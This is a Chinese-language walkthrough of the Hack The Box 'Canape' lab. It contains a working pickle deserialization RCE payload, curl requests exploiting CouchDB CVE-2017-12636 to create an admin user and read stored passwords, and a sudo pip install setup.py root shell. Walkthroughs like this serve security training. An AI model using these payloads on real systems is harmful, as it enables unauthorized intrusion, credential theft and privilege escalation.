端口扫描

┌──(mikannse㉿kali)-[~/HTB/canape]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 19:53 CST
Nmap scan report for canape.htb (10.10.10.70)
Host is up (0.073s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
65535/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds
┌──(mikannse㉿kali)-[~/HTB/canape]
└─$ sudo nmap -sT -sV -sC -O -p80,65535 10.10.10.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 19:55 CST
Nmap scan report for canape.htb (10.10.10.70)
Host is up (0.064s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Simpsons Fan Site
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git:
| 10.10.10.70:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: final # Please enter the commit message for your changes. Li...
| Remotes:
|_ http://git.canape.htb/simpsons.git
65535/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
| 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (95%), Crestron 2-Series (86%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 (95%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%), Linux 5.3 - 5.4 (88%), Crestron XPanel control system (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds

添加hosts:canape.htb,git.canape.htb

Pickle反序列化

用gittool能将.gitdump下来

git.canape.htb的仓库也可以git clone下来,经过对比是一样的内容,init.py是这个web应用的源码。分析一下源码。

首先比较值得注意的就是cPickle.loads这个反序列化函数,大概率就是从这里入手了。那么倒过来看,cPickle加载一个/tmp目录下的序列化对象,而这个序列化对象又是在/submit路由写入的,所以只需要构造character和quote,传入序列化过的payload执行就行。虽然对前者有过滤但并不是完全的黑名单,如”homer!”可以符合白名单。

接下来只要套板子就可以了,但是在编写payload的时候遇到了python3的编码问题,于是选用python2,靶机上也是python2环境,才有cPickle库

开启tcpdump监听icmp包,运行payload,成功接受到包,进行反弹shell

class CommandExecute(object):
def __reduce__(self):
return(os.system,("homer!;ping -c 1 10.10.14.11",))

character,quote=cPickle.dumps(CommandExecute()).split('!')
p_id = md5(character + quote).hexdigest()
requests.post("http://canape.htb/submit",data={'character':character,'quote':quote})
requests.post("http://canape.htb/check",data={'id':p_id})

在/git的目录中有一个,但暂时不知道怎么用

$ cat .htpasswd
homer:Git Access:7818cef8b9dc50f4a70fd299314cb9eb

CVE-2017-12636

想起之前连接的是couchDB数据库

$ curl -X GET http://localhost:5984/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 91 100 91 0 0 9100 0 --:--:-- --:--:-- --:--:-- 9100
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}

发现版本是2.0.0,存在一个数据库提权漏洞

根据: https://www.anquanke.com/post/id/87256

$ curl -X PUT -d '{"type":"user","name":"mikannse","roles":["_admin"],"roles":[],"password":"123456"}' localhost:5984/_users/org.couchdb.user:mikannse -H "Content-Type:application/json"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 171 100 88 100 83 9777 9222 --:--:-- --:--:-- --:--:-- 19000
{"ok":true,"id":"org.couchdb.user:mikannse","rev":"1-195263f29c15ed60e1086654c5d633e6"}
$ curl -X GET -u mikannse:123456 http://localhost:5984/passwords/_all_docs
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 591 0 591 0 0 65666 0 --:--:-- --:--:-- --:--:-- 65666
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
$ curl -X GET -u mikannse:123456 http://localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 144 100 144 0 0 24000 0 --:--:-- --:--:-- --:--:-- 24000
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}

找到homer用户的ssh密码,ssh登录,端口要改

应该也可以根据这个直接拿到homer用户的权限,因为couch是以homer用户运行的: https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/README.zh-cn.md

提权

homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User homer may run the following commands on canape:
(root) /usr/bin/pip install *

GTFOBINS一把梭

homer@canape:/tmp$ TF=$(mktemp -d)
homer@canape:/tmp$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
homer@canape:/tmp$ sudo pip install $TF
Processing ./tmp.5zPXio0xgA
# whoami
root

碎碎念

最近正好在看辛普森的一家,非常有代入感233也是质量很高的一个房间,pickle反序列化,couchdb提权其实都是之前遇到过的东西。但还是很值得练习一次的